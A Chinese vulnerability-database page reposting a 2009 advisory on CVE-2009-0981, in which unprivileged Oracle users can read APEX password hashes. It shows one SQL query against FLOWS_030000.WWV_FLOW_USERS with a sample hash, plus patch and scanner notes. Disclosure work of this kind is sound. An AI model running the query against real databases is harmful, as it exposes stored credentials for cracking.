Unprivileged DB users can see APEX password hashes

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052036 漏洞类型
发布时间 2009-04-16 更新时间 2009-04-16
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2009040044
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Unprivileged DB users can see APEX password hashes [CVE-2009-0981]

Name                      Unprivileged DB users can see APEX password  
hashes
Systems Affected  APEX 3.0 (optional component of 11.1.0.7 installation)
Severity                   High Risk
Category                 Password Disclosure
Vendor URL           http://www.oracle.com/
Author                     Alexander Kornbrust
CVE                         CVE-2009-0981
Advisory                 14 April 2009 (V 1.00)


Details:
Unprivileged database users can see APEX password hashes in  

FLOWS_030000.WWV_FLOW_USER.

SQL> select user_name,web_password2 from FLOWS_030000.WWV_FLOW_USERS

USER_NAME    WEB_PASSWORD2
---------------------------------------------------------------------------
YURI         141FA790354FB6C72802FDEA86353F31

This password hash can be checked using a tool like Repscan.


Additional information is available in the following advisory.


Advisory:
http://www.red-database-security.com/advisory/apex_password_hashes.html


Patch Information:
Upgrade to Oracle APEX 3.2.


Verification:
Our Oracle database scanner Repscan was updated with the information  
from the Oracle
CPU April 2009 and can identify vulnerable databases.
More Information about Repscan can be found here:
http://www.sentrigo.com/repscan


History:
13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Advisory published


About Red-Database-Security:
Red-Database-Security is the leading company for Oracle security.  
Within the last 6 years we reported several hundred vulnerabilities to Oracle.